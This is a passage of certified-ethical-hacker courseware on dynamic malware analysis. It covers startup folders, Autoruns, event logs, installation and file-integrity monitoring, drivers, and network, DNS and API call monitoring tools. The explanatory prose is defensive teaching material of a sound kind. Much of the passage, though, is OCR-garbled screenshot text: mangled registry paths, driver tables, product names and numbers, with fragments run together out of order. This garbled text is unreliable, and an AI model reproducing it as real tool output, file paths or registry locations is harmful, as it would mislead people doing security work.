‘©pBlock Level Backup Engine... The WBENG.. ‘GyBluetooth Audio Gateway’... Service sup. ‘LBluetooth Support Service The Bluetoo.
Manual Loc: Manual (Tig... Loc: Manual (ig... Loc:
|\ Extended /(Standard,
Figure 7.99: Screenshot displaying services
=
Step 5: Check the Startup folder Startup folders store applications or shortcuts to applications that auto-start when the system boots. To check the Startup applications, search the following locations in Windows 11: ©
C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\Startup
©
C:\Users\ (User-Name) \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Another method to access startup folders is as follows: 1.
Press Windows + R simultaneously to open the Run box
2.
Type shell: startup in the box and click OK to navigate to the startup folder & Run
x
=
‘Type the name of a program, folder, document, or Internet
Open:
| shelkstartup
resource, and Windows will open it for you.
v
Figure 7.100: Screenshot showing shell: startup command in the Run box
Module 07 Page 1139 :
Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Startup Program Monitoring Tool: Autoruns for Windows
Source: https://docs.microsoft.com This utility can auto-start configured to run during Windows processes them. and other registry keys, explorer shell extensions, start services.
the location of any startup monitor, display what programs are system bootup or login, and show the entries in the order that Once this program is included in the startup folder, Run, RunOnce, users can configure Autoruns to show other locations, including toolbars, browser helper objects, Winlogon notifications, and auto-
Autoruns' Hide Signed Microsoft Entries option helps the user to zoom in on third-party autostart images that are added to the user’s system, and it provides support for checking the autostart images configured for other accounts on the system. Autoruns- Sysinternals: wwwsysinternals.com File Search Entry Options Category Help
-
SEIOD/SRZ|t/MED TB Codecs
-
oP Boot Execute EFL imageHijacks CG Appin —- KnownDLls Ap D Network Providers @ saProviders B everthing Bogen Explorer © Internet Explorer BS Autoruns Entry Description | HKCU Softwar\Clazes\"\Shellx\ContestMenuHondlers Be Fiesyncéx Microsoft OneDrive Shell Extension |g HKCU Softwar\Classes\ Directory ShellEx\ContextMenuHondles Je. FileSyncEx Microsoft OneDrive Shell Extension |g HKCU Softwar\Classes\Directory\Background\ hellEx\ContestMenuHondlers Bo Fiesynctx Microsoft OneDrive Shell Extension | HKLM Software\Classes\"\Shellx\ContextMenuHandlers Gis ANotepade+54 ShellNandle for Notepads (6 bt) Microsoft Security Client Shell Extension ‘ee (af HKLM Software| Clarses\Drive\Shellfc\ContextMenuHandlers ep Microsoft Securty Client Shell Extension |g HKLM Software\Classes\Directon\Shellc\ContertMenuHandlers oe Microsoft Securty Client Shell Extension |g HKLM Software| Classes\Folde Shells \DragDropHonclers BB winrar WinRAR shell extension (BS HKLM Software\Microsoft\Windows\CurrentVersion\Explores\ShelconOverayldentifers Go Onedrivet Microsoft OneDrive Shell Extension Microsoft OneDrive Shell Extension Be Onediive? Go Onedrives Micrzof& OneDrive Shell Extension Be Onediives Microsoft OneDrive Shell Extension
@
x
Winlogon EB WinsockProviders Print Monitors © office vn scheduled Tacks & Sewices D Dviver Publisher Image Path (Verified) (Werfied) (Veried) (Werfied)
Microsoft Corporation Mictoseft Corporation Microsoft Corporation Notepads
C:\Users\Admin\AppData\Loc C:\Users\Admin\ppData\Loc C:\Users\Admin\ppData\Loc (C\Program Fies\Notepad>+!
(Not Verified) Microsoft Corporati... C:\Program Files\Windows De
(Not Verified) Microsoft Corporati... (Not Verified) Microsoft Corporat. (Werfied winrar GmbH (Werfied) Microseft Corporation (Weried) Microsoft Corporation (Veried) Microsoft Corporation (Weried) Microsoft Corporation
C:\Program Files\Windows De C:\Program Files\Windows De (CAProgram Files\ WinRAR C:\Users\Admin\AppData\Lov :\Users\Admin\AppData\Loc C:\Users\Admin\ppData\Loc C\Users\Admin\AppDatalLoc
Ready Figure 7.101: Screenshot of Autoruns for Windows
Some additional startup programs monitoring tools are as follows: =
WinPatrol (https://www.bleepingcomputer.com)
=
Autorun Organizer (https://www.chemtable.com)
=
Quick Startup (https://www.glarysoft.com)
=
StartEd Pro (https://www.outertech.com)
=
Chameleon Startup Manager (https://www.chameleon-managers.com)
Module 07 Page 1140
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Dynamic Malware Analysis: Event Logs Monitoring/Analysis @ Log analysis is a process of analyzing
computer-generated recordsor activities to identify malicious or suspicious events @ Use log analysis tools like Splunk to identify suspicious logs or events with malicious intent
Log Analysis Tools @ ManageEngine Event Log Analyzer
(https://www.manageengine.com)
CE H
Itisa SIEM tool that can automatically collect all the
Splunk
| events logs from all the systems present in the network
a
=
Sa
Pars
New Search
="
© Loggly (http://www. loggly.com)
a -s
2
tt sok. com
@ SolarWinds Log & Event Manager (LEM) (https://www.solarwinds.com) @ Netwrix Event Log Manager (https://www.netwrix.com)
Event Logs Monitoring/Analysis Log analysis is a process that provides the details of an activity or event that can extract possible attacks in the form of Trojans or worms in the system. It serves as a primary source of information and helps in identifying security gaps. This process helps in detecting zero-day backdoor Trojans or any possible attacks (failed authentication/login attempts) when logs are analyzed for different components. Log monitoring can be performed for components that perform security operations, such as firewall systems, IDS/IPS, web servers, and authentication servers. The logs also contain file types, ports, timestamps, and registry entries. In Windows, system logs, application logs, access logs, audit logs, and security logs can be analyzed in Event Viewer under the section “Windows Logs.”
Logs are located via the following paths: =
System logs
Start > Windows Administrative Tools > Event Viewer > Windows Logs =
System Security logs
Start > Windows Administrative Tools =
> Event Viewer > Windows Logs > Security
Applications and Services Logs Start > Windows Administrative Tools > Event Viewer > Applications and Services
Logs
Module 07 Page 1141 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Log Analysis Tools: =
Splunk Source: https://www.splunk.com It is an SIEM tool that can automatically collect present in the network. Splunk forwarders need network that need to be monitored, and these event logs from the network systems to the main
€ > SO
lecathost:
a
icoruata
all the event logs from all the systems to be installed in all the systems in the forwarders will transfer the real-time Splunk dashboard.
foot
C:\Program Files\Suricata\log\tastiog Figure 7.102: Screenshot of Splunk
Some additional log monitoring/analysis tools are as follows: =
ManageEngine Event Log Analyzer (https://www.manageengine.com)
=
Loggly (https://www.loggly.com)
=
SolarWinds Log & Event Manager (https://www.solarwinds.com)
=
Netwrix Event Log Manager (https://www.netwrix.com)
Module 07 Page 1142
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
Dynamic Malware Analysis: Installation Monitoring @ When the system or users install or uninstall any software application, there is a chance that traces of the application data are left on the system @ Installation monitoring will help in detecting hidden and background installations that the malware performs ‘@
CEH
Mirekusoft Install Monitor It automatically monitors what gets placed on your system and allows you to completely uninstall it
Use installation monitoring tools such as Mirekusoft Install Monitor for monitoring the installation of malicious executables
© @ @ @
Installation Monitoring Tools SysAnalyzer (https://www.aldeid.com) Advanced Uninstaller PRO (https://www. advanceduninstaller.com) REVO UNINSTALLER PRO (https://www.revouninstaller.com) Comodo Programs Manager (https://www.comodo.com)
Installation Monitoring When the system or user installs or uninstalls any software application, traces of the application data might remain on the system. To find these traces, you should know the folders modified or created during the installation process as well as the files and folders that have not been modified by the uninstall process. Installation monitoring helps in detecting hidden and background installations performed by malware. Tools such as SysAnalyzer can be used to monitor the installation of malicious executables.
Module 07 Page 1143 :
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats =
Exam 312-50 Certified Ethical Hacker
Mirekusoft Install Monitor
Source: https://www.mirekusoft.com Mirekusoft Install Monitor automatically monitors what is placed on your system and allows you to uninstall it completely. It works by monitoring resources (such as file and registry) that are created when a program is installed. It provides detailed information about the software installed. Furthermore, it helps you to determine the disk, CPU, and memory consumption of your programs. It also provides information about how often you use different programs. A program tree is a useful tool that can show you which programs were installed together. Mirekusoft install Monitor
‘Manage and uninstall progrems. Select multiple programsto batch uninsal
Name PE Micekucot install Monitor (5 Microsoft SL Server
Publisher
W)Microsoft Visual
BB dove Acrobat 0¢ 64-bit) @ WicrosottOnedrive Wa Microsoft Edge WebView2 Runtime @ sofPerect Network Scanner version 8.13 © oo9 [Gi Notepad+~ (64-bit x64) -G}}ava8 Update 321 (64-bit) ‘{DMozilia Maintenance Service Ei) Microsoft Update Health Tools Ek winkan 6.10 64-bit) TB) Microsoft Edge Update
Microsoft Corporation Microsoft Corporation Microsoft Corporation SoftPerfect Py Ltd Google Notepas Oracle Corporation Riverbed Technology, Inc. Mozilla Microsoft Corporation winrar Gmbkt
Publisher: Ruware Version: 35:5.2017.8 Wate: Today, Api 62022, 22 minutes ago (Size: 4.05 MB (4253247 bytes) Size of registry: 1.52 KB (1565 bytes) |About: httos//snww.winpatrol.com
Installed 416122740 AM 4/6/2273 AM 4/8/2273 AM M.
Size 250 KB 19.1 MB 831K 831 KB.
4/6722 657 AM 4/6/2648 AM 418/22.647 AM 416122647 AM 416122.647 AM 4/622.6:44 AM 4/8/22. 6:40 AM 2/9/22 122. 8M 22722.11:15 PM 2/2/22 11:05 PM, 2/2/22 1053 PM. 1/27/22 138 AM 126/22 11334P..
206 MB 728 MB, 530M8 486 MB 492. MB 19.78 535 MB 250KB 225 MB 11aKe 905 KB 102 MB 7.2MB
Version 48,1080. 402876. 14:16.27033.0
View > Search programs Last Used Usage
22.001.20085 2208502270. 100.0.185.29 100.0.18529 813 100.04896.75. 824 8032107 4102900 9603 28700 6.100 13.5585,
Contains: 23 Files, Registry: 2 Keys, 23 Values
Figure 7.103: Screenshot of Mirekusoft Install Monitor
Some additional installation monitoring tools are as follows: SysAnalyzer (https://www.aldeid.com) Advanced Uninstaller PRO (https://www.advanceduninstaller.com) REVO UNINSTALLER PRO (https://www.revouninstaller.com)
Comodo Programs Manager (https://www.comodo.com)
Module 07 Page 1144
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Dynamic Malware Analysis: Files and Folders Monitoring @ Malware programs normally modify system files and folders after infecting a computer @
Use file and folder integrity checkers like PA File Sight, Tripwire, and Netwrix Auditor to
CE H
PA File Sight
@ Itaudits who is deleting files, moving files, or reading files. It also detects users copying files and optionally blocks access
detect changes in system files and folders
File and Folder Integrity Checking Tools
© Tripwire File integrity and Change Manager (https://www.tripwire.com)
By serverzozz
@ Netwrix Auditor (https://www.netwrix.com)
© Verisys (https://www.ionx.co.uk) © CSP File Integrity Checker (https://www.cspsecurity.com) © NNT Change Tracker (https://www.newnettechnologies.com)
Files and Folders Monitoring Malware can modify the system files and folders to save some information in them. You should be able to find the files and folders that the malware creates and analyze them to collect any relevant stored information. These files and folders may also contain hidden program code or malicious strings that the malware would schedule for execution according to a specified schedule. Scan for suspicious files and folders using tools such as PA File Sight, Tripwire, and Netwrix Auditor, to detect any Trojans installed as well as system file modifications.
Module 07 Page 1145 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
PA File Sight
Source: https://www.poweradmin.com PA File Sight is a protection and auditing tool. It detects ransomware attacks coming from the network and stops them. Features: o
Compromised computers are blocked from reaching files on other protected servers on the network
o
Detects users copying files and optionally blocks access
o
Real-time alerts allow appropriate staff to investigate immediately
o
Monitors who is deleting, moving, or reading files
@ Parle Sight Ure Console -vB-4.0.174 [ Connected to WINDOWSI1 as Admin J - Licensed te: PA File Sight v8 Ul Tal License (30 days left) File View Configuration Settings Licensing Alerts Help
Ps
© st sevice
eos
res
-
| YOUR LOGO HERE | Sistteatamoe* Watch C:\Users\Adr &
[Eh inventory Collector
SERVER2022
Group Reports
‘SERVER2022 remote satelite
x
i
ve
2 amen
@
Updated
AllReports
System Information NT AUTHORISYSTEM [Lo90nU ¢¢6) =< | NT AUTHORITYISYSTEM [evchost exe] [-—=—=—=—=— NT AUTHORITYILOCAL SERVICE [svchost ¢1¢) —$—=——
Total vO Reads mites Meketes
CEMininsto opore| ——— CEM AdminEator notepad oe) CEHAaminstatorevchostxe) -—— NT AUTHORITYISYSTEM [PAAPIProxy32.638] [—
ue pound =
NT AUTHORITY'SYSTEM [127.001] -—=—=—=" NT AUTHORITY'SYSTEM [sass exe] [-————=—=—= NTAUTHORITYSYSTEM [iiss o3) =e 1
All Actions
Reports
Ga
|
10
Hourly Alert Rate
‘
100
4,000
show desktop
5
+
Figure 7.104: Screenshot of PA File Sight Some additional file integrity checking tools are as follows: =
Tripwire File Integrity and Change Manager (https://www.tripwire.com)
=
Netwrix Auditor (https://www.netwrix.com)
=
Verisys (https://www.ionx.co.uk)
=
CSP File Integrity Checker (https://www.cspsecurity.com)
=
NNT Change Tracker (https://www.newnettechnologies.com)
Module 07 Page 1146
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Dynamic Malware Analysis: Device Drivers Monitoring @
Malwareis installed along with device drivers
downloaded from untrusted sources, and attackers use these drivers asa shield to avoid detection
|@ Use device driver monitoring tools such as DriverView to scan for suspicious device drivers and verify if the device drivers are genuine and downloaded from the publisher's original site
C
DriverView
DriverView utility displaysa list of all the device drivers currently loaded on the system along with information such as load address of
the driver, description, version, and product name
@ Goto Run > Type msinfo32 > Software Environment
> system Drivers to manually check for installed drivers
ya
Device Driver Monitoring Tools
© Driver Booster (https://www.iobit.com) © Driver Reviver (https://www.reviversoft.com) © Driver Easy (https://www.drivereasy.com) © Driver Fusion (https://treexy.com)
© Driver Genius 22 (https://www.driver-soft.com)
=
Device Drivers Monitoring Malware is installed on the system along with the device drivers when the user downloads infected drivers from untrusted sources. The malware uses these drivers to avoid detection. One can scan for suspicious device drivers using tools such as DriverView and Driver Detective, to verify whether they are genuine and whether they have been downloaded from the publisher’s original site. The path to the location of Windows system drivers is as follows: Goto Run > Type msinfo32 > Software Environment > System Drivers |B Sytem information Fle Edt View Help ‘System Summary {Hardware Resources {Components © Softnare Enaronment ans mironment varies Toe dione eee Aa ses ee Program Groups Stomup Programs OLE Resisraton Windows Error Reporting
Find what Cisearch selected category only
Name Description Fle “ype 1394 compha. z el ware Share lwindows\s...Kemel api Microsoft ACP Driver ciwindows\s...Kemel facpidev _ACPLDevies driver windows\s. Keel acpiex Microsoft ACPEX Dri. cwindows\s..Kemel aepipagr ACPI Processor Agr... cwindows\s..Kemel acpipmi —_ACPLPower Meter Dr. c\windows\s...Kemel acptime ACPI Wake Alarm Dri. e\windows\s.. Kernel ‘01000 Ac01000 lwindows\s..Kemel adpeoee —ADPa0K windows\s...Kemel ats Ancilary Function Ori. ciwindows\s...Kemel \windows\s... Keel fui func aheache Application Compa... cwindows\s...Kemel amdgpic2 AMD GPO CertOri. ciwindows\s..Kemel amd2c AMD 2C Controler...\windows\s.. Kemel amdkd AMOS ProcessorD_. c\windows\s..Kemel lamdppm AMD Processor Driver ciwindows\s...Kemel amdsataamdsata windows\s...Kemel amdsbs —amdsbs windows\s.. Keel famdeata amet windows\s...Kemel appid App Driver Cwindows\s...Kemel Cseaceh category names onty
Start. Drvet_No_ Driver Yes Driver Yes Driver No Driver Yes Driver No Driver No Driver No Driver No Driver Yes Driver Yes Driver Yes Driver Yes Driver No Driver No Driver No Driver No Driver Yes Driver Yes Driver Yes Driver No
-
ox
Stan Mode Manual Manwal oct Manual Soot Manual Manual Manwal Manual Manual System system System Manual Manual Manual Manual Marval Manval_ Manwal Manual
state Stop Running Running Stopped Ruming Stopped Stopped Stopped Stopped Running Running Rung Running Stopped Stopped Stopped Stopped Running Running Running Stopped
4
lose Find
Figure 7.105: Screenshot displaying Windows System Drivers
Module 07 Page 1147 :
Ethical Hacking and Countermeasures Copyright © by E6-Goul All Rights Reserved. Reproduction is Strictly Prohibi
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
DriverView
Source: https://www. nirsoft.net The DriverView utility displays the list of all device drivers currently loaded in the system. For each driver in the list, additional information is displayed, such as load address of the driver, description, version, product name, and maker. Features:
©
Displays the list of all loaded drivers in your system
o
Standalone executable
& Driverview
-
ile fait View Options Help Bag
o
xXx
oan
DiverName / Address End Address | Sie load Count index FileType Description version Company Bi g2waresys FFFFFOODG..FFFFFOO06.0001C000 166 SytemDriver LSl3waresCSiStorport Drives S051 1S @Acrisys ——FFFFFBODS... FFFFFRODS... 0x000cc000 1 24 SystemDiver—ACPIDriverforNT 10002000489 Microsoft Corpor @rcpiersys —_FFFFF0006... F¥FFFa00S... 000026000 1 20 Dynamic Linki. ACPIEx Driver 100220001 Microsoft Corpor @avrcoxxsys FFFFFeOns... FFFFFEOO... oxoN25c000 1 $3 SystemDiver_PMC-SieraStorport DrverFor SPC... 130.1076 PMC-Siera Qstasys FFFFFEODS,..FFFFF2O0%S,.. 000034000 1 151 System river Ancilary Function Drverfor WinSock 100022000:194 Microsoft Corpor @otunixsys ——FFFFFO00S... FFFFFaODS... 000012000 1 150 System Driver AFLUNKK socket provider 10022000348 Microsoft Corpor @ehcachesys _FFFFFEODS... FFFFFEDU... 000053000 1 167 System river___Appication Compatibity Cache —10.022000.1 Microsoft Corpor Advanced Micro 143277 AHCI 1.3 Device Driver 67 System Driver _FFFFFEOUS... FFFFFEO... Ox0001f000 1 @amdsatasys @omaibsays —_FFFFFO0D6... FFFFF206... 000067000 1 6 SjstemDiiver_ AMD Technology AHCI Compatible... 7.154043 AMD Technolog @omaxstasys —FFFFFEODS.,. FFFFFEDUS... Oc0O0D000 1 68 SyetemDiiver Storage FiterDiver 33277 ‘Rdvanced Micro @Applessd.sys FFFFFOOOS... FFFFF2O0S... 000023000 1 6 Unknown ‘Apple Sli State Drive Device 6172001 Applet. @orcsazsys ——_FFFFFEO08... FFFFFED0%... oo0025000 1 70 System Driver Adaptec SAS RAID WSO Driver 7032018 PMC-Sierra Ine @etapisys ——_FFFFFEODS... FFFFFEOU%... cxoD00d000 1 89 SystemDiiver_—_ATAPIIDE Miniport Driver 10022000258 Microsoft Corpor @rponsvs —_FFFFFOODS... FFFFFBO0S... 00003000 1 90 System Driver _ATAP| Driver Extension 10022000258 Microsoft Corpot Microsoft Corpor 10.0.22000.1 System Driver. © BAM Kemel Driver 166 FFFFF000'.. FFFFFEOO'... 0x00018000 1 @ramsys @esicdieplayays FFFFFBODS... FFFFFRODS... 0100015000 1 142 Display Driver Microsoft Basic Display Driver 100220001 Microsoft Corpor @essicRendersys FFFFFEODS... FFFFFEOU%... OxOO0TT000 1 143 Display Driver Microsoft Basic Render Driver 100220001 Microsoft Corpot Microsoft Corpor 10.022000.1 BEEP Driver System Driver. 139 FFFFFBOOS... FFFFFBOO6... 000003000 1 Qbeepsvs @rinaeesys —_FFFFFEOO'S... FFFFFEOO'S... 0000230001 208 System Diver Windows Bind Fite Driver 1002200034 Microsoft Corpor @eoor.a —FFFFFEODS.. FFFFFEDU... OxOO0Db000 1 7 Display Diver VGA Boot Driver 100220001 Microsoft Corpor @bonsersys —_FFFFFOODS... FFFFF9008... 000027000 1 200 System Diver NTLan Manager Datagram Receiver... 10.022000.48 Microsoft Corpor @oeiesys —_-FFFFFB0O8... FFFFF8008... 000100001 116 System river VHD BTT Fite Driver 100220001 Microsoft Corpor @rrvodasys —FFFFFEOD... FFFFFEOU%... 000080000 1 59 Network Diver QLogic Gigabit EthemetVED 73231105 QLogic Corporati @csa.ai FFFFASAD.. FFFFARAD... 000012000 1 195 Display Driver Canonical Display Driver 10022000434 Microsoft Corpor @cdtssys FFFFFOOO8... FFFF2008... 00001100 1 23 SystemDiver CD-ROM File Sytem Driver 100.22000.1 Microsoft Corpor @carornsys —_FFFFFEODS.,. FFFFFEOUS... Oro0030000 1 135. System Driver SCSICD-ROM Driver 100220001 Microsoft Corpor @cerys FFFFFOODS... FFFFF@006... 000017000 3 38 —_DynamicLinkLi. Event Aggregation Kernel Mode Library 100220001 Microsoft Corpor Ociesex6ioys —FFFFFEO0S... FFFFFEOD%... Oco005c000 1 87 SysterDiver__Cheksio iSCSI VMinipor Driver 6114100 Celso Commut @ciai FFFFFEODS... FFFFFEO0S,.. Ox000et000 2 158 SystemDriver__Code Integrty Module 10022000469 Microsoft Corpor @ccimessvs —_FFFFFH00S... FFFFFa00S... 000025000 1 146 Dynamic Link Li. CimFS diver 10022000469 Microsoft Corpor @reincconocvs seEEFINNR FEEEEAMTE nvonnmmnnn 2 nos CFI er Siren nn 72000 104 Mirenenfe Cnet 2Titem(), 1 Selected Figure 7.106: Screenshot of DriverView
Some additional device driver monitoring tools are as follows: =
Driver Booster (https://www.iobit.com)
=
Driver Reviver (https://www.reviversoft.com)
=
Driver Easy (https://www.drivereasy.com)
=
Driver Fusion (https://treexy.com)
=
Driver Genius 22 (https://www.driver-soft.com)
Module 07 Page 1148
Ethical Hacking and Countermeasures Copyright © by EC-Cot All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
Dynamic Malware Analysis: Network Traffic Monitoring/Analysis ‘@ Malware programs connect back to their handlers
and send confidential informationto attackers
(@ Use network scanners and packet sniffers to monitor
network traffic going to malicious remote addresses
@ Use network scanning tools such as SolarWinds NetFlow Traffic Analyzer and Capsa to monitor
CE H
SolarWinds NetFlow Traffic Analyzer
Traffic Analyzer collects trafficdata, correlatesit into NetFlow
a useable format, and presentsit to the user in a web-based
interface for monitoring network traffic
el
network traffic and look for suspicious malware activities Network Activity Monitoring Tools © Caspa Network Analyzer (https://www.colasoft.com) e Wireshark (https://www.wireshark.org) @ PRTG Network Monitor (https://kb.paessler.com) e GFI LanGuard (https://www.gfi.com) e NetFort LANGuardian (https://www.netfort.com)
Network Traffic Monitoring/Analysis Network analysis is the process of capturing network traffic and investigating it carefully to identify malware activity. It helps to determine the type of traffic/network packets or data transmitted across the network.
Malware depends on the network for various activities such as propagation, downloading malicious content, transmitting sensitive files and information, and offering remote control to attackers. Therefore, you should adopt techniques that can detect malware artifacts and usage across networks. Some malware connects back to the handlers and sends confidential information to them. In dynamic analysis, you run a piece of malware in a controlled environment that is installed with various network monitoring tools to trace all the networking activities of the malware. Network monitoring tools such as SolarWinds NetFlow Traffic Analyzer, Capsa Network Analyzer, and Wireshark, can be used to monitor and capture live network traffic to and from the victim’s system during execution of the suspicious program. This will help to understand the malware’s network artifacts, signatures, functions, and other elements.
=
SolarWinds NetFlow Traffic Analyzer Source: https://www.solarwinds.com NetFlow Traffic Analyzer collects traffic data, converts it into a useable format, and presents it to the user in a web-based interface for monitoring network traffic. Features:
o
Network traffic analysis
o
Bandwidth monitoring
Module 07 Page 1149 :
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
o
Application traffic alerting
o
Performance analysis
©
CBQOS policy optimization
©
Malicious or malformed traffic flow identification
Details - EAST-2821-WAN Node ow NetFl Last Hours ~ ingress
©
ow nanaaton
——
4
Top 5 Applications
Top Endpoints
~
[eee
a.
a
a
er
rT
a
a
OM
ke
ome
cam
Figure 7.107: Screenshot of SolarWinds NetFlow Traffic Analyzer
Some additional network activity monitoring tools are as follows: =
Caspa Network Analyzer (https://www.colasoft.com)
=
Wireshark (https://www.wireshark.org)
=
PRTG Network Monitor (https://kb. paessler.com)
=
GFI LanGuard (https://www.gfi.com)
=
NetFort LANGuardian (https://www.netfort.com)
Module 07 Page 1150
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Dynamic Malware Analysis: DNS Monitoring/Resolution ‘@
DNsChangerisa malicious software capable
of changing the system’s DNS server settings and provides the attackers with the control of the DNS server used on the victim's system
(C€ E H
|| DNSQuerySniffer | DNSQuerySnifferis a network sniffer utility that shows the DNS | queries sent on your system
|@ Use DNS monitoringtools such as DNSQuerySnifferto verify the DNS servers that the malware tries to connectto and identify the type of connection
DNS Monitoring/Resolution Tools
© DNSstuff (https://www.dnsstuff.com) ©
UltraDNS (https://neustarsecurityservices.com)
@
SonarLite Web App (https://constellix.com)
ete /fuw.nirsoft net
DNS Monitoring/Resolution Malicious software such as DNSChanger can change the system’s DNS server settings, thus providing attackers with control of the DNS server used in the victim’s system. Subsequently, the attackers can control the sites to which the user tries to connect through the Internet, make him/her connect to a fraudulent website, or interfere with his/her online web browsing. Therefore, you should determine whether the malware is capable of changing any DNS server settings while performing dynamic analysis. You can use tools such as DNSQuerySniffer and DNSstuff, to verify the DNS servers that the malware tries to connect to and identify the type of connection.
Module 07 Page 1151 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
DNSQuerySniffer Source: https://www.nirsoft.net DNSQuerySniffer is a network sniffer utility that shows system. For every DNS query, the following information number, query ID, request type (A, AAAA, NS, MX, and time, duration, response code, number of records, and records. You can easily export the DNS query delimited/XML/HTML file or copy the DNS queries to the into Excel or other spreadsheet applications.
a File Fait View Options Help OLEELE HeaNane —[PotNomber |GueyiD | repatc @Bvidevents.dat.... 65197 1097 Tiwpadiocedo., 45047 -oteg-—«| Host Name: @eooresiden 697 0130 Port Number: Qcxcsmicrosoft... @atidlwindows...
50265 65167
6ac 280
Query:
Peetings-wind... 61009
Foi
Request Time:
Gormsetingste ozs
ta t_—_|
setings win.data.microsof.com (e1009
ll
Request Type:
the DNS queries sent on your is displayed: host name, port so on), request time, response content of the returned DNS information to a CSV/tabclipboard and then paste them
% Fes Coure [A
20.189.173.10
7
cnaNE
_global.asimov.events
20479:972u. wowing com. 18430.282.57 208.111.136..
SRIGTITST
cxes:microsoftneteg wu-bg-shimtraffiem
stings prod-eus2-d
Response Time:
Duration: Response beds: Records Count:
he CNAME:
oO
AAAA:
Ns: Mx
‘SOA:
Pr: SRV:
‘TEXT:
Source Address: Destination Address: IP Country:
Pease
WirSoR Freeware hipliwww.nirsoet Figure 7.108: Screenshot of DNSQuerySniffer
Some additional DNS monitoring/resolution tools are as follows:
=
DNSstuff (https://www.dnsstuff.com)
=
UltraDNs (https://neustarsecurityservices.com)
=
Sonar Lite Web App (https://constellix.com)
Module 07 Page 1152
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Dynamic Malware Analysis: API Calls Monitoring @ Application programming interfaces (APIs) are parts of the Windows OS that allow external applications to access OS information suchas file systems, threads, errors, registry, and kernel @ Malware programs employ these APIs to access the operating system information and cause damage to the systems @ Analyzingthe API calls may reveal the suspected program’s interaction with the OS
API Monitor
API Monitor
allows
CE H you to monitor
and
display Win32 API calls made by applications
‘@ Use API call monitoring tools such as API Monitorto
monitorAPI calls made by applications
API Call Monitoring Tools
© APimetrics (https://apimetrics.io) @ Runscope (https://www.runscope.com) © AlertSite (https://smartbear.com)
Titps Janu apimonir Com
API Calls Monitoring Application programming interfaces (APIs) are parts of the Windows OS that allow external applications to access OS information such as file systems, threads, errors, registry, kernel, buttons, mouse pointer, network services, web, and the Internet. Malware programs also use these APIs to access the OS information and cause damage to the system. You need to gather the APIs related to the malware programs and analyze them to reveal their interaction with the OS as well as the activities they have been performing over the system. Use API call monitoring tools such as API Monitor to monitor API calls made by applications.
Module 07 Page 1153 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
API Monitor
Source: https://www.apimonitor.com API Monitor is a software that allows you to monitor and display Win32 API calls made by applications. It can trace any exported API and it displays a wide range of information, including function name, call sequence, input and output parameters, function return value, etc. It is a useful developer tool for understanding how Win32 applications work and for learning their tricks. af Action File Grid Help > 8 Il DG)
VB
vews-
§ @ | Buytow
Process and Thread» AP! Selector =a ‘API Name Fiter Profle:
v) | Save
API Categowy
API Name:
-
oO
x Delete —_IsErty API
T~ Only Selected Items
dskdpe. dl CO apvapiaa di
CD AdsBuldvavtnayiee CO AbsBuildVartirayStr CO ADsDecodetinayyData D ADsEncodeBinayData O ADsErumerateNent | (D AdsFreeAd:Values O ADsFreeE numerator | S Sumary I CO ADsGetLasténor CD ADsGetdbject apr va CO) odplusl CADsOpendbject Apr De | iettutidl Time § CO ADsSetLastémnor areal C) AdsTypeToPropVariant C teeter Pepi Mem ee D AlocaD st ee | BinarySDT oSecurtyDescrintor nets | Options D ConventSecDescriptorToVaiant foreoe C8 Deri dpay1 AP va cled by ide AP C ConetSecuiyDesinaT Seder 1 onvertTrusteeT oi on performance) =) picsrtinloadow a setious impact C) Show GetLastEnor Have alee (none) | sb mero Default Parameter Nu Length pees @ (none) 33 SelectAlAP! Clear AIAPL | Add DLL. ‘OK
a
L F
al J
Cancel
jul Figure 7.109: Screenshot of API Monitor
Some additional API monitoring tools are as follows: =
APImetrics (https://apimetrics.io)
=
Runscope (https://www.runscope.com)
=
AlertSite (https://smartbear.com)
Module 07 Page 1154
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
